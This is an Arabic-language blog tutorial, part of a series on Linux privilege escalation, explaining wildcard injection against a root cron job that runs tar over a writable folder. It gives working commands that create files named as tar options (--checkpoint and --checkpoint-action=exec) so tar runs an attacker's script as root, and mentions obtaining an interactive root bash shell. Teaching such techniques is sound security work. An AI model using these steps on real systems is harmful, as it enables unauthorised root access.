pt3[linux privilege escalation techniques] Wildcard Injection

السلام عليكم ورحمة الله وبركاتة،

تكمله لسلسة Linux Privilege Escalation techniques راح نتكلم عن Wildcard injection

في البداية ناخذ تعريف عن Wildcard injection بكل بساطة هي رموز في اللينكس[?]([]) [*] مميزه  يرمز على الجميع،

 تستخدم مع جميع الباينيري على الينكس. مثال على ذالك ناخذ امر مع wildcard &ls

لو فرضنا لدينا مجلد يحتوي على كثير من انواع متعدده من الملفات بامتدادات مختلفه ونريد ان نظهر فقط الملفات التي بمتداد gif مثلا، الامر يكون كالتالي بستخدام wildcard

ls -lia *.gif
مثل مانلاحظ قام بستخراج جميع الملفات الموجوده داخل الملجلد تحت امتداد gif


طيب الان بعد ماعرفنا ماهو wildcard واستخدامه، نجي لزبده الموضوع كيف يتم التصعيد من wildcard

التكنيك المستخدم wildcard injection كثيره ولكن راح اتطرق على للب او اساس الموضوع حتى اترك لكم ساحة التفكير ، في البداية راح ابسط فكرة الحقن , لنفرض
 ا) الروت قام بعمل cron job للامر tar كل ٥ دقائق على مجلد /home/example/*
ب) الهكر لديه التصريح على ملجد example

الفكرة الهكر يقوم بحقن متغير معين في الباينيري tar يسمح له بالاتصال ع باينيري اخر مثلا bin/bash -i
يحصل على interactive shell من الباش بصلاحيات الروت عندما يقوم بتنفيذ امر الضغط كل خمس دقائق وينفذ الحقن الذي قام به الهكر في المجلد ناخذ مثال/فكرة في الية الحقن،

 echo "" > --help
ls * سوف يقوم بطابعه واجهه help بدلا من عرض الملفات والمجلدات للجميع. اعتقد وضحت الفكرة
الان ناخذ مثال

 نلاحظ هنا ، وجود كرون جوب كل ١٠ دقائق يقوم بعمل ضغط لملجلد /tmp/backup/* باستخدام wildcard

 دخلنا المجلد ووجدنا انه لدينا صلاحيات كامله في المجلد نقوم بحقن امر checkpoints في tar حتى 
 echo "id > tt.txt;chmod 777 tt.txt" > exec.sh
 chmod +x exec.sh
echo "" > --checkpoint=1
 echo "" > "--checkpoint-action=exec=sh exec.sh"
 بعد الانتظار ١٠دقائق نلاحظ بأن الملف tt.txt موجود نقوم بالقراءه والناتج
 
دمتم بود.

تعليقات

المشاركات الشائعة من هذه المدونة

Deserialization vulnerability in Node.js RCE

Html code injection-[Post-Get-StoredData!]-

CRLF injection [\r\n Carriage Return]